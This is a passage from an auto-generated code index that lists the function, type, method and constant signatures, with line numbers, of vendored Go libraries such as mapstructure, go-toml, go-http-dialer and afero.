func (rr *ZONEMD) copy() RR { FILE: vendor/github.com/mitchellh/mapstructure/decode_hooks.go function typedDecodeHook (line 16) | func typedDecodeHook(h DecodeHookFunc) DecodeHookFunc { function DecodeHookExec (line 41) | func DecodeHookExec( function ComposeDecodeHookFunc (line 62) | func ComposeDecodeHookFunc(fs ...DecodeHookFunc) DecodeHookFunc { function StringToSliceHookFunc (line 82) | func StringToSliceHookFunc(sep string) DecodeHookFunc { function StringToTimeDurationHookFunc (line 102) | func StringToTimeDurationHookFunc() DecodeHookFunc { function StringToIPHookFunc (line 121) | func StringToIPHookFunc() DecodeHookFunc { function StringToIPNetHookFunc (line 145) | func StringToIPNetHookFunc() DecodeHookFunc { function StringToTimeHookFunc (line 165) | func StringToTimeHookFunc(layout string) DecodeHookFunc { function WeaklyTypedHook (line 187) | func WeaklyTypedHook( function RecursiveStructToMapHookFunc (line 218) | func RecursiveStructToMapHookFunc() DecodeHookFunc { function TextUnmarshallerHookFunc (line 239) | func TextUnmarshallerHookFunc() DecodeHookFuncType { FILE: vendor/github.com/mitchellh/mapstructure/error.go type Error (line 12) | type Error struct method Error (line 16) | func (e *Error) Error() string { method WrappedErrors (line 30) | func (e *Error) WrappedErrors() []error { function appendErrors (line 43) | func appendErrors(errors []string, err error) []string { FILE: vendor/github.com/mitchellh/mapstructure/mapstructure.go type DecodeHookFunc (line 185) | type DecodeHookFunc interface type DecodeHookFuncType (line 189) | type DecodeHookFuncType type DecodeHookFuncKind (line 193) | type DecodeHookFuncKind type DecodeHookFuncValue (line 197) | type DecodeHookFuncValue type DecoderConfig (line 201) | type DecoderConfig struct type Decoder (line 274) | type Decoder struct method Decode (line 397) | func (d *Decoder) Decode(input interface{}) error { method decode (line 402) | func (d *Decoder) decode(name string, input interface{}, outVal reflec... method decodeBasic (line 490) | func (d *Decoder) decodeBasic(name string, data interface{}, val refle... method decodeString (line 546) | func (d *Decoder) decodeString(name string, data interface{}, val refl... method decodeInt (line 598) | func (d *Decoder) decodeInt(name string, data interface{}, val reflect... method decodeUint (line 645) | func (d *Decoder) decodeUint(name string, data interface{}, val reflec... method decodeBool (line 702) | func (d *Decoder) decodeBool(name string, data interface{}, val reflec... method decodeFloat (line 733) | func (d *Decoder) decodeFloat(name string, data interface{}, val refle... method decodeMap (line 780) | func (d *Decoder) decodeMap(name string, data interface{}, val reflect... method decodeMapFromSlice (line 816) | func (d *Decoder) decodeMapFromSlice(name string, dataVal reflect.Valu... method decodeMapFromMap (line 835) | func (d *Decoder) decodeMapFromMap(name string, dataVal reflect.Value,... method decodeMapFromStruct (line 889) | func (d *Decoder) decodeMapFromStruct(name string, dataVal reflect.Val... method decodePtr (line 991) | func (d *Decoder) decodePtr(name string, data interface{}, val reflect... method decodeFunc (line 1038) | func (d *Decoder) decodeFunc(name string, data interface{}, val reflec... method decodeSlice (line 1051) | func (d *Decoder) decodeSlice(name string, data interface{}, val refle... method decodeArray (line 1128) | func (d *Decoder) decodeArray(name string, data interface{}, val refle... method decodeStruct (line 1195) | func (d *Decoder) decodeStruct(name string, data interface{}, val refl... method decodeStructFromMap (line 1238) | func (d *Decoder) decodeStructFromMap(name string, dataVal, val reflec... type Metadata (line 280) | type Metadata struct function Decode (line 291) | func Decode(input interface{}, output interface{}) error { function WeakDecode (line 307) | func WeakDecode(input, output interface{}) error { function DecodeMetadata (line 324) | func DecodeMetadata(input interface{}, output interface{}, metadata *Met... function WeakDecodeMetadata (line 341) | func WeakDecodeMetadata(input interface{}, output interface{}, metadata ... function NewDecoder (line 359) | func NewDecoder(config *DecoderConfig) (*Decoder, error) { function isEmptyValue (line 1436) | func isEmptyValue(v reflect.Value) bool { function getKind (line 1454) | func getKind(val reflect.Value) reflect.Kind { FILE: vendor/github.com/mwitkow/go-http-dialer/auth.go constant hdrProxyAuthResp (line 9) | hdrProxyAuthResp = "Proxy-Authorization" constant hdrProxyAuthReq (line 10) | hdrProxyAuthReq = "Proxy-Authenticate" type ProxyAuthorization (line 14) | type ProxyAuthorization interface type basicAuth (line 28) | type basicAuth struct method Type (line 38) | func (b *basicAuth) Type() string { method InitialResponse (line 42) | func (b *basicAuth) InitialResponse() string { method ChallengeResponse (line 46) | func (b *basicAuth) ChallengeResponse(challenge string) string { method authString (line 52) | func (b *basicAuth) authString() string { function AuthBasic (line 34) | func AuthBasic(username string, password string) ProxyAuthorization { FILE: vendor/github.com/mwitkow/go-http-dialer/dialer.go type opt (line 19) | type opt function New (line 25) | func New(proxyUrl *url.URL, opts ...opt) *HttpTunnel { function WithTls (line 37) | func WithTls(tlsConfig *tls.Config) opt { function WithDialer (line 44) | func WithDialer(dialer *net.Dialer) opt { function WithConnectionTimeout (line 51) | func WithConnectionTimeout(timeout time.Duration) opt { function WithProxyAuth (line 58) | func WithProxyAuth(auth ProxyAuthorization) opt { type HttpTunnel (line 65) | type HttpTunnel struct method parseProxyUrl (line 73) | func (t *HttpTunnel) parseProxyUrl(proxyUrl *url.URL) { method dialProxy (line 88) | func (t *HttpTunnel) dialProxy() (net.Conn, error) { method Dial (line 96) | func (t *HttpTunnel) Dial(network string, address string) (net.Conn, e... method doRoundtrip (line 140) | func (t *HttpTunnel) doRoundtrip(conn net.Conn, req *http.Request) (*h... method performAuthChallengeResponse (line 150) | func (t *HttpTunnel) performAuthChallengeResponse(resp *http.Response)... FILE: vendor/github.com/pelletier/go-toml/fuzz.go function Fuzz (line 5) | func Fuzz(data []byte) int { FILE: vendor/github.com/pelletier/go-toml/keysparsing.go function parseKey (line 13) | func parseKey(key string) ([]string, error) { function isValidBareChar (line 110) | func isValidBareChar(r rune) bool { FILE: vendor/github.com/pelletier/go-toml/lexer.go type tomlLexStateFn (line 17) | type tomlLexStateFn type tomlLexer (line 20) | type tomlLexer struct method read (line 35) | func (l *tomlLexer) read() rune { method next (line 47) | func (l *tomlLexer) next() rune { method ignore (line 56) | func (l *tomlLexer) ignore() { method skip (line 62) | func (l *tomlLexer) skip() { method fastForward (line 67) | func (l *tomlLexer) fastForward(n int) { method emitWithValue (line 73) | func (l *tomlLexer) emitWithValue(t tokenType, value string) { method emit (line 82) | func (l *tomlLexer) emit(t tokenType) { method peek (line 86) | func (l *tomlLexer) peek() rune { method peekString (line 93) | func (l *tomlLexer) peekString(size int) string { method follow (line 102) | func (l *tomlLexer) follow(next string) bool { method errorf (line 108) | func (l *tomlLexer) errorf(format string, args ...interface{}) tomlLex... method lexVoid (line 119) | func (l *tomlLexer) lexVoid() tomlLexStateFn { method lexRvalue (line 156) | func (l *tomlLexer) lexRvalue() tomlLexStateFn { method lexDateTimeOrNumber (line 231) | func (l *tomlLexer) lexDateTimeOrNumber() tomlLexStateFn { method lexLeftCurlyBrace (line 257) | func (l *tomlLexer) lexLeftCurlyBrace() tomlLexStateFn { method lexRightCurlyBrace (line 264) | func (l *tomlLexer) lexRightCurlyBrace() tomlLexStateFn { method lexDateTimeOrTime (line 274) | func (l *tomlLexer) lexDateTimeOrTime() tomlLexStateFn { method lexDateTime (line 304) | func (l *tomlLexer) lexDateTime() tomlLexStateFn { method lexTimeOffset (line 428) | func (l *tomlLexer) lexTimeOffset() tomlLexStateFn { method lexTime (line 469) | func (l *tomlLexer) lexTime() tomlLexStateFn { method lexTrue (line 515) | func (l *tomlLexer) lexTrue() tomlLexStateFn { method lexFalse (line 521) | func (l *tomlLexer) lexFalse() tomlLexStateFn { method lexInf (line 527) | func (l *tomlLexer) lexInf() tomlLexStateFn { method lexNan (line 533) | func (l *tomlLexer) lexNan() tomlLexStateFn { method lexEqual (line 539) | func (l *tomlLexer) lexEqual() tomlLexStateFn { method lexComma (line 545) | func (l *tomlLexer) lexComma() tomlLexStateFn { method lexKey (line 556) | func (l *tomlLexer) lexKey() tomlLexStateFn { method lexComment (line 619) | func (l *tomlLexer) lexComment(previousState tomlLexStateFn) tomlLexSt... method lexLeftBracket (line 632) | func (l *tomlLexer) lexLeftBracket() tomlLexStateFn { method lexLiteralStringAsString (line 639) | func (l *tomlLexer) lexLiteralStringAsString(terminator string, discar... method lexLiteralString (line 667) | func (l *tomlLexer) lexLiteralString() tomlLexStateFn { method lexStringAsString (line 694) | func (l *tomlLexer) lexStringAsString(terminator string, discardLeadin... method lexString (line 802) | func (l *tomlLexer) lexString() tomlLexStateFn { method lexTableKey (line 828) | func (l *tomlLexer) lexTableKey() tomlLexStateFn { method lexInsideTableArrayKey (line 843) | func (l *tomlLexer) lexInsideTableArrayKey() tomlLexStateFn { method lexInsideTableKey (line 867) | func (l *tomlLexer) lexInsideTableKey() tomlLexStateFn { method lexRightBracket (line 886) | func (l *tomlLexer) lexRightBracket() tomlLexStateFn { method lexNumber (line 913) | func (l *tomlLexer) lexNumber() tomlLexStateFn { method run (line 1012) | func (l *tomlLexer) run() { type validRuneFn (line 896) | type validRuneFn function isValidHexRune (line 898) | func isValidHexRune(r rune) bool { function isValidOctalRune (line 905) | func isValidOctalRune(r rune) bool { function isValidBinaryRune (line 909) | func isValidBinaryRune(r rune) bool { function lexToml (line 1019) | func lexToml(inputBytes []byte) []token { FILE: vendor/github.com/pelletier/go-toml/localtime.go type LocalDate (line 43) | type LocalDate struct method String (line 66) | func (d LocalDate) String() string { method IsValid (line 71) | func (d LocalDate) IsValid() bool { method In (line 85) | func (d LocalDate) In(loc *time.Location) time.Time { method AddDays (line 91) | func (d LocalDate) AddDays(n int) LocalDate { method DaysSince (line 97) | func (d LocalDate) DaysSince(s LocalDate) (days int) { method Before (line 105) | func (d1 LocalDate) Before(d2 LocalDate) bool { method After (line 116) | func (d1 LocalDate) After(d2 LocalDate) bool { method MarshalText (line 122) | func (d LocalDate) MarshalText() ([]byte, error) { method UnmarshalText (line 128) | func (d *LocalDate) UnmarshalText(data []byte) error { function LocalDateOf (line 50) | func LocalDateOf(t time.Time) LocalDate { function ParseLocalDate (line 57) | func ParseLocalDate(s string) (LocalDate, error) { type LocalTime (line 141) | type LocalTime struct method String (line 173) | func (t LocalTime) String() string { method IsValid (line 182) | func (t LocalTime) IsValid() bool { method MarshalText (line 190) | func (t LocalTime) MarshalText() ([]byte, error) { method UnmarshalText (line 196) | func (t *LocalTime) UnmarshalText(data []byte) error { function LocalTimeOf (line 150) | func LocalTimeOf(t time.Time) LocalTime { function ParseLocalTime (line 162) | func ParseLocalTime(s string) (LocalTime, error) { type LocalDateTime (line 206) | type LocalDateTime struct method String (line 239) | func (dt LocalDateTime) String() string { method IsValid (line 244) | func (dt LocalDateTime) IsValid() bool { method In (line 261) | func (dt LocalDateTime) In(loc *time.Location) time.Time { method Before (line 266) | func (dt1 LocalDateTime) Before(dt2 LocalDateTime) bool { method After (line 271) | func (dt1 LocalDateTime) After(dt2 LocalDateTime) bool { method MarshalText (line 277) | func (dt LocalDateTime) MarshalText() ([]byte, error) { method UnmarshalText (line 283) | func (dt *LocalDateTime) UnmarshalText(data []byte) error { function LocalDateTimeOf (line 214) | func LocalDateTimeOf(t time.Time) LocalDateTime { function ParseLocalDateTime (line 227) | func ParseLocalDateTime(s string) (LocalDateTime, error) { FILE: vendor/github.com/pelletier/go-toml/marshal.go constant tagFieldName (line 17) | tagFieldName = "toml" constant tagFieldComment (line 18) | tagFieldComment = "comment" constant tagCommented (line 19) | tagCommented = "commented" constant tagMultiline (line 20) | tagMultiline = "multiline" constant tagLiteral (line 21) | tagLiteral = "literal" constant tagDefault (line 22) | tagDefault = "default" type tomlOpts (line 25) | type tomlOpts struct type encOpts (line 37) | type encOpts struct type annotation (line 46) | type annotation struct type MarshalOrder (line 64) | type MarshalOrder constant OrderAlphabetical (line 69) | OrderAlphabetical MarshalOrder = iota + 1 constant OrderPreserve (line 72) | OrderPreserve function isPrimitive (line 86) | func isPrimitive(mtype reflect.Type) bool { function isTimeType (line 107) | func isTimeType(mtype reflect.Type) bool { function isTreeSequence (line 112) | func isTreeSequence(mtype reflect.Type) bool { function isCustomMarshalerSequence (line 124) | func isCustomMarshalerSequence(mtype reflect.Type) bool { function isTextMarshalerSequence (line 136) | func isTextMarshalerSequence(mtype reflect.Type) bool { function isOtherSequence (line 148) | func isOtherSequence(mtype reflect.Type) bool { function isTree (line 160) | func isTree(mtype reflect.Type) bool { function isCustomMarshaler (line 173) | func isCustomMarshaler(mtype reflect.Type) bool { function callCustomMarshaler (line 177) | func callCustomMarshaler(mval reflect.Value) ([]byte, error) { function isTextMarshaler (line 181) | func isTextMarshaler(mtype reflect.Type) bool { function callTextMarshaler (line 185) | func callTextMarshaler(mval reflect.Value) ([]byte, error) { function isCustomUnmarshaler (line 189) | func isCustomUnmarshaler(mtype reflect.Type) bool { function callCustomUnmarshaler (line 193) | func callCustomUnmarshaler(mval reflect.Value, tval interface{}) error { function isTextUnmarshaler (line 197) | func isTextUnmarshaler(mtype reflect.Type) bool { function callTextUnmarshaler (line 201) | func callTextUnmarshaler(mval reflect.Value, text []byte) error { type Marshaler (line 207) | type Marshaler interface type Unmarshaler (line 213) | type Unmarshaler interface function Marshal (line 252) | func Marshal(v interface{}) ([]byte, error) { type Encoder (line 257) | type Encoder struct method Encode (line 285) | func (e *Encoder) Encode(v interface{}) error { method QuoteMapKeys (line 300) | func (e *Encoder) QuoteMapKeys(v bool) *Encoder { method ArraysWithOneElementPerLine (line 319) | func (e *Encoder) ArraysWithOneElementPerLine(v bool) *Encoder { method Order (line 325) | func (e *Encoder) Order(ord MarshalOrder) *Encoder { method Indentation (line 331) | func (e *Encoder) Indentation(indent string) *Encoder { method SetTagName (line 337) | func (e *Encoder) SetTagName(v string) *Encoder { method SetTagComment (line 343) | func (e *Encoder) SetTagComment(v string) *Encoder { method SetTagCommented (line 349) | func (e *Encoder) SetTagCommented(v string) *Encoder { method SetTagMultiline (line 355) | func (e *Encoder) SetTagMultiline(v string) *Encoder { method PromoteAnonymous (line 368) | func (e *Encoder) PromoteAnonymous(promote bool) *Encoder { method CompactComments (line 374) | func (e *Encoder) CompactComments(cc bool) *Encoder { method marshal (line 379) | func (e *Encoder) marshal(v interface{}) ([]byte, error) { method nextTree (line 424) | func (e *Encoder) nextTree() *Tree { method valueToTree (line 429) | func (e *Encoder) valueToTree(mtype reflect.Type, mval reflect.Value) ... method valueToTreeSlice (line 507) | func (e *Encoder) valueToTreeSlice(mtype reflect.Type, mval reflect.Va... method valueToOtherSlice (line 520) | func (e *Encoder) valueToOtherSlice(mtype reflect.Type, mval reflect.V... method valueToToml (line 533) | func (e *Encoder) valueToToml(mtype reflect.Type, mval reflect.Value) ... method appendTree (line 583) | func (e *Encoder) appendTree(t, o *Tree) error { method wrapTomlValue (line 597) | func (e *Encoder) wrapTomlValue(val interface{}, parent *Tree) interfa... function NewEncoder (line 270) | func NewEncoder(w io.Writer) *Encoder { method Unmarshal (line 619) | func (t *Tree) Unmarshal(v interface{}) error { method Marshal (line 626) | func (t *Tree) Marshal() ([]byte, error) { function Unmarshal (line 654) | func Unmarshal(data []byte, v interface{}) error { type Decoder (line 663) | type Decoder struct method Decode (line 685) | func (d *Decoder) Decode(v interface{}) error { method SetTagName (line 695) | func (d *Decoder) SetTagName(v string) *Decoder { method Strict (line 702) | func (d *Decoder) Strict(strict bool) *Decoder { method unmarshal (line 707) | func (d *Decoder) unmarshal(v interface{}) error { method valueFromTree (line 749) | func (d *Decoder) valueFromTree(mtype reflect.Type, tval *Tree, mval1 ... method valueFromTreeSlice (line 908) | func (d *Decoder) valueFromTreeSlice(mtype reflect.Type, tval []*Tree)... method valueFromOtherSlice (line 927) | func (d *Decoder) valueFromOtherSlice(mtype reflect.Type, tval []inter... method valueFromOtherSliceI (line 944) | func (d *Decoder) valueFromOtherSliceI(mtype reflect.Type, tval interf... method valueFromToml (line 980) | func (d *Decoder) valueFromToml(mtype reflect.Type, tval interface{}, ... method unwrapPointer (line 1152) | func (d *Decoder) unwrapPointer(mtype reflect.Type, tval interface{}, ... method unmarshalText (line 1169) | func (d *Decoder) unmarshalText(tval interface{}, mval reflect.Value) ... function NewDecoder (line 673) | func NewDecoder(r io.Reader) *Decoder { function makeSliceOrArray (line 964) | func makeSliceOrArray(mtype reflect.Type, tLength int) (reflect.Value, e... function tomlOptions (line 1175) | func tomlOptions(vf reflect.StructField, an annotation) tomlOpts { function isZero (line 1217) | func isZero(val reflect.Value) bool { function formatError (line 1226) | func formatError(err error, pos Position) error { type visitorState (line 1234) | type visitorState struct method push (line 1252) | func (s *visitorState) push(key string) { method pop (line 1258) | func (s *visitorState) pop() { method visit (line 1264) | func (s *visitorState) visit() { method visitAll (line 1270) | func (s *visitorState) visitAll() { method validate (line 1280) | func (s *visitorState) validate() error { function newVisitorState (line 1241) | func newVisitorState(tree *Tree) visitorState { function insertKeys (line 1295) | func insertKeys(path []string, m map[string]struct{}, tree *Tree) { FILE: vendor/github.com/pelletier/go-toml/parser.go type tomlParser (line 15) | type tomlParser struct method raiseError (line 26) | func (p *tomlParser) raiseError(tok *token, msg string, args ...interf... method run (line 30) | func (p *tomlParser) run() { method peek (line 36) | func (p *tomlParser) peek() *token { method assume (line 43) | func (p *tomlParser) assume(typ tokenType) { method getToken (line 53) | func (p *tomlParser) getToken() *token { method parseStart (line 62) | func (p *tomlParser) parseStart() tomlParserStateFn { method parseGroupArray (line 87) | func (p *tomlParser) parseGroupArray() tomlParserStateFn { method parseGroup (line 140) | func (p *tomlParser) parseGroup() tomlParserStateFn { method parseAssign (line 170) | func (p *tomlParser) parseAssign() tomlParserStateFn { method parseRvalue (line 274) | func (p *tomlParser) parseRvalue() interface{} { method parseInlineTable (line 404) | func (p *tomlParser) parseInlineTable() *Tree { method parseArray (line 448) | func (p *tomlParser) parseArray() interface{} { type tomlParserStateFn (line 23) | type tomlParserStateFn function numberContainsInvalidUnderscore (line 235) | func numberContainsInvalidUnderscore(value string) error { function hexNumberContainsInvalidUnderscore (line 255) | func hexNumberContainsInvalidUnderscore(value string) error { function cleanupNumberToken (line 269) | func cleanupNumberToken(value string) string { function tokenIsComma (line 400) | func tokenIsComma(t *token) bool { function parseToml (line 496) | func parseToml(flow []token) *Tree { FILE: vendor/github.com/pelletier/go-toml/position.go type Position (line 14) | type Position struct method String (line 21) | func (p Position) String() string { method Invalid (line 27) | func (p Position) Invalid() bool { FILE: vendor/github.com/pelletier/go-toml/token.go type tokenType (line 6) | type tokenType method String (line 90) | func (tt tokenType) String() string { constant eof (line 9) | eof = -(iota + 1) constant tokenError (line 13) | tokenError tokenType = iota constant tokenEOF (line 14) | tokenEOF constant tokenComment (line 15) | tokenComment constant tokenKey (line 16) | tokenKey constant tokenString (line 17) | tokenString constant tokenInteger (line 18) | tokenInteger constant tokenTrue (line 19) | tokenTrue constant tokenFalse (line 20) | tokenFalse constant tokenFloat (line 21) | tokenFloat constant tokenInf (line 22) | tokenInf constant tokenNan (line 23) | tokenNan constant tokenEqual (line 24) | tokenEqual constant tokenLeftBracket (line 25) | tokenLeftBracket constant tokenRightBracket (line 26) | tokenRightBracket constant tokenLeftCurlyBrace (line 27) | tokenLeftCurlyBrace constant tokenRightCurlyBrace (line 28) | tokenRightCurlyBrace constant tokenLeftParen (line 29) | tokenLeftParen constant tokenRightParen (line 30) | tokenRightParen constant tokenDoubleLeftBracket (line 31) | tokenDoubleLeftBracket constant tokenDoubleRightBracket (line 32) | tokenDoubleRightBracket constant tokenLocalDate (line 33) | tokenLocalDate constant tokenLocalTime (line 34) | tokenLocalTime constant tokenTimeOffset (line 35) | tokenTimeOffset constant tokenKeyGroup (line 36) | tokenKeyGroup constant tokenKeyGroupArray (line 37) | tokenKeyGroupArray constant tokenComma (line 38) | tokenComma constant tokenColon (line 39) | tokenColon constant tokenDollar (line 40) | tokenDollar constant tokenStar (line 41) | tokenStar constant tokenQuestion (line 42) | tokenQuestion constant tokenDot (line 43) | tokenDot constant tokenDotDot (line 44) | tokenDotDot constant tokenEOL (line 45) | tokenEOL type token (line 84) | type token struct method String (line 98) | func (t token) String() string { function isSpace (line 109) | func isSpace(r rune) bool { function isAlphanumeric (line 113) | func isAlphanumeric(r rune) bool { function isKeyChar (line 117) | func isKeyChar(r rune) bool { function isKeyStartChar (line 124) | func isKeyStartChar(r rune) bool { function isDigit (line 128) | func isDigit(r rune) bool { function isHexDigit (line 132) | func isHexDigit(r rune) bool { FILE: vendor/github.com/pelletier/go-toml/toml.go type tomlValue (line 13) | type tomlValue struct type Tree (line 23) | type Tree struct method Position (line 52) | func (t *Tree) Position() Position { method Has (line 57) | func (t *Tree) Has(key string) bool { method HasPath (line 65) | func (t *Tree) HasPath(keys []string) bool { method Keys (line 70) | func (t *Tree) Keys() []string { method Get (line 85) | func (t *Tree) Get(key string) interface{} { method GetPath (line 94) | func (t *Tree) GetPath(keys []string) interface{} { method GetArray (line 131) | func (t *Tree) GetArray(key string) interface{} { method GetArrayPath (line 140) | func (t *Tree) GetArrayPath(keys []string) interface{} { method GetPosition (line 210) | func (t *Tree) GetPosition(key string) Position { method SetPositionPath (line 219) | func (t *Tree) SetPositionPath(keys []string, pos Position) { method GetPositionPath (line 263) | func (t *Tree) GetPositionPath(keys []string) Position { method GetDefault (line 304) | func (t *Tree) GetDefault(key string, def interface{}) interface{} { method SetWithOptions (line 323) | func (t *Tree) SetWithOptions(key string, opts SetOptions, value inter... method SetPathWithOptions (line 329) | func (t *Tree) SetPathWithOptions(keys []string, opts SetOptions, valu... method Set (line 384) | func (t *Tree) Set(key string, value interface{}) { method SetWithComment (line 390) | func (t *Tree) SetWithComment(key string, comment string, commented bo... method SetPath (line 397) | func (t *Tree) SetPath(keys []string, value interface{}) { method SetPathWithComment (line 403) | func (t *Tree) SetPathWithComment(keys []string, comment string, comme... method Delete (line 409) | func (t *Tree) Delete(key string) error { method DeletePath (line 419) | func (t *Tree) DeletePath(keys []string) error { method createSubTree (line 442) | func (t *Tree) createSubTree(keys []string, pos Position) error { function newTree (line 31) | func newTree() *Tree { function newTreeWithPosition (line 35) | func newTreeWithPosition(pos Position) *Tree { function TreeFromMap (line 43) | func TreeFromMap(m map[string]interface{}) (*Tree, error) { function getArray (line 178) | func getArray(n []interface{}) interface{} { type SetOptions (line 314) | type SetOptions struct function LoadBytes (line 468) | func LoadBytes(b []byte) (tree *Tree, err error) { function hasUTF16BigEndianBOM2 (line 490) | func hasUTF16BigEndianBOM2(b []byte) bool { function hasUTF16LittleEndianBOM2 (line 494) | func hasUTF16LittleEndianBOM2(b []byte) bool { function hasUTF8BOM3 (line 498) | func hasUTF8BOM3(b []byte) bool { function hasUTF32BigEndianBOM4 (line 502) | func hasUTF32BigEndianBOM4(b []byte) bool { function hasUTF32LittleEndianBOM4 (line 506) | func hasUTF32LittleEndianBOM4(b []byte) bool { function LoadReader (line 511) | func LoadReader(reader io.Reader) (tree *Tree, err error) { function Load (line 521) | func Load(content string) (tree *Tree, err error) { function LoadFile (line 526) | func LoadFile(path string) (tree *Tree, err error) { FILE: vendor/github.com/pelletier/go-toml/tomlpub.go method Value (line 6) | func (ptv *PubTOMLValue) Value() interface{} { method Comment (line 9) | func (ptv *PubTOMLValue) Comment() string { method Commented (line 12) | func (ptv *PubTOMLValue) Commented() bool { method Multiline (line 15) | func (ptv *PubTOMLValue) Multiline() bool { method Position (line 18) | func (ptv *PubTOMLValue) Position() Position { method SetValue (line 22) | func (ptv *PubTOMLValue) SetValue(v interface{}) { method SetComment (line 25) | func (ptv *PubTOMLValue) SetComment(s string) { method SetCommented (line 28) | func (ptv *PubTOMLValue) SetCommented(c bool) { method SetMultiline (line 31) | func (ptv *PubTOMLValue) SetMultiline(m bool) { method SetPosition (line 34) | func (ptv *PubTOMLValue) SetPosition(p Position) { method Values (line 41) | func (pt *PubTree) Values() map[string]interface{} { method Comment (line 45) | func (pt *PubTree) Comment() string { method Commented (line 49) | func (pt *PubTree) Commented() bool { method Inline (line 53) | func (pt *PubTree) Inline() bool { method SetValues (line 57) | func (pt *PubTree) SetValues(v map[string]interface{}) { method SetComment (line 61) | func (pt *PubTree) SetComment(c string) { method SetCommented (line 65) | func (pt *PubTree) SetCommented(c bool) { method SetInline (line 69) | func (pt *PubTree) SetInline(i bool) { FILE: vendor/github.com/pelletier/go-toml/tomltree_create.go function typeFor (line 29) | func typeFor(k reflect.Kind) reflect.Type { function simpleValueCoercion (line 36) | func simpleValueCoercion(object interface{}) (interface{}, error) { function sliceToTree (line 78) | func sliceToTree(object interface{}) (interface{}, error) { function toTree (line 123) | func toTree(object interface{}) (interface{}, error) { FILE: vendor/github.com/pelletier/go-toml/tomltree_write.go type valueComplexity (line 16) | type valueComplexity constant valueSimple (line 19) | valueSimple valueComplexity = iota + 1 constant valueComplex (line 20) | valueComplex type sortNode (line 23) | type sortNode struct function encodeMultilineTomlString (line 31) | func encodeMultilineTomlString(value string, commented string) string { function encodeTomlString (line 75) | func encodeTomlString(value string) string { function tomlTreeStringRepresentation (line 106) | func tomlTreeStringRepresentation(t *Tree, ord MarshalOrder) (string, er... function tomlValueStringRepresentation (line 129) | func tomlValueStringRepresentation(v interface{}, commented string, inde... function getTreeArrayLine (line 228) | func getTreeArrayLine(trees []*Tree) (line int) { function sortByLines (line 240) | func sortByLines(t *Tree) (vals []sortNode) { function sortAlphabetical (line 279) | func sortAlphabetical(t *Tree) (vals []sortNode) { method writeTo (line 319) | func (t *Tree) writeTo(w io.Writer, indent, keyspace string, bytesCount ... method writeToOrdered (line 323) | func (t *Tree) writeToOrdered(w io.Writer, indent, keyspace string, byte... function quoteKeyIfNeeded (line 445) | func quoteKeyIfNeeded(k string) string { function quoteKey (line 465) | func quoteKey(k string) string { function writeStrings (line 469) | func writeStrings(w io.Writer, s ...string) (int, error) { method WriteTo (line 483) | func (t *Tree) WriteTo(w io.Writer) (int64, error) { method ToTomlString (line 490) | func (t *Tree) ToTomlString() (string, error) { method String (line 500) | func (t *Tree) String() string { method ToMap (line 516) | func (t *Tree) ToMap() map[string]interface{} { function tomlValueToGo (line 536) | func tomlValueToGo(v interface{}) interface{} { FILE: vendor/github.com/pelletier/go-toml/tomltree_writepub.go function ValueStringRepresentation (line 4) | func ValueStringRepresentation(v interface{}, commented string, indent s... FILE: vendor/github.com/spf13/afero/afero.go type Afero (line 32) | type Afero struct type File (line 37) | type File interface type Fs (line 57) | type Fs interface FILE: vendor/github.com/spf13/afero/basepath.go type BasePathFs (line 21) | type BasePathFs struct method RealPath (line 42) | func (b *BasePathFs) RealPath(name string) (path string, err error) { method Chtimes (line 72) | func (b *BasePathFs) Chtimes(name string, atime, mtime time.Time) (err... method Chmod (line 79) | func (b *BasePathFs) Chmod(name string, mode os.FileMode) (err error) { method Chown (line 86) | func (b *BasePathFs) Chown(name string, uid, gid int) (err error) { method Name (line 93) | func (b *BasePathFs) Name() string { method Stat (line 97) | func (b *BasePathFs) Stat(name string) (fi os.FileInfo, err error) { method Rename (line 104) | func (b *BasePathFs) Rename(oldname, newname string) (err error) { method RemoveAll (line 114) | func (b *BasePathFs) RemoveAll(name string) (err error) { method Remove (line 121) | func (b *BasePathFs) Remove(name string) (err error) { method OpenFile (line 128) | func (b *BasePathFs) OpenFile(name string, flag int, mode os.FileMode)... method Open (line 139) | func (b *BasePathFs) Open(name string) (f File, err error) { method Mkdir (line 150) | func (b *BasePathFs) Mkdir(name string, mode os.FileMode) (err error) { method MkdirAll (line 157) | func (b *BasePathFs) MkdirAll(name string, mode os.FileMode) (err erro... method Create (line 164) | func (b *BasePathFs) Create(name string) (f File, err error) { method LstatIfPossible (line 175) | func (b *BasePathFs) LstatIfPossible(name string) (os.FileInfo, bool, ... method SymlinkIfPossible (line 187) | func (b *BasePathFs) SymlinkIfPossible(oldname, newname string) error { method ReadlinkIfPossible (line 202) | func (b *BasePathFs) ReadlinkIfPossible(name string) (string, error) { type BasePathFile (line 26) | type BasePathFile struct method Name (line 31) | func (f *BasePathFile) Name() string { function NewBasePathFs (line 36) | func NewBasePathFs(source Fs, path string) Fs { function validateBasePathName (line 56) | func validateBasePathName(name string) error { FILE: vendor/github.com/spf13/afero/cacheOnReadFs.go type CacheOnReadFs (line 22) | type CacheOnReadFs struct method cacheStatus (line 48) | func (u *CacheOnReadFs) cacheStatus(name string) (state cacheState, fi... method copyToLayer (line 74) | func (u *CacheOnReadFs) copyToLayer(name string) error { method copyFileToLayer (line 78) | func (u *CacheOnReadFs) copyFileToLayer(name string, flag int, perm os... method Chtimes (line 82) | func (u *CacheOnReadFs) Chtimes(name string, atime, mtime time.Time) e... method Chmod (line 103) | func (u *CacheOnReadFs) Chmod(name string, mode os.FileMode) error { method Chown (line 124) | func (u *CacheOnReadFs) Chown(name string, uid, gid int) error { method Stat (line 145) | func (u *CacheOnReadFs) Stat(name string) (os.FileInfo, error) { method Rename (line 158) | func (u *CacheOnReadFs) Rename(oldname, newname string) error { method Remove (line 179) | func (u *CacheOnReadFs) Remove(name string) error { method RemoveAll (line 195) | func (u *CacheOnReadFs) RemoveAll(name string) error { method OpenFile (line 211) | func (u *CacheOnReadFs) OpenFile(name string, flag int, perm os.FileMo... method Open (line 238) | func (u *CacheOnReadFs) Open(name string) (File, error) { method Mkdir (line 282) | func (u *CacheOnReadFs) Mkdir(name string, perm os.FileMode) error { method Name (line 290) | func (u *CacheOnReadFs) Name() string { method MkdirAll (line 294) | func (u *CacheOnReadFs) MkdirAll(name string, perm os.FileMode) error { method Create (line 302) | func (u *CacheOnReadFs) Create(name string) (File, error) { function NewCacheOnReadFs (line 28) | func NewCacheOnReadFs(base Fs, layer Fs, cacheTime time.Duration) Fs { type cacheState (line 32) | type cacheState constant cacheMiss (line 36) | cacheMiss cacheState = iota constant cacheStale (line 38) | cacheStale constant cacheHit (line 42) | cacheHit constant cacheLocal (line 45) | cacheLocal FILE: vendor/github.com/spf13/afero/const_bsds.go constant BADFD (line 22) | BADFD = syscall.EBADF FILE: 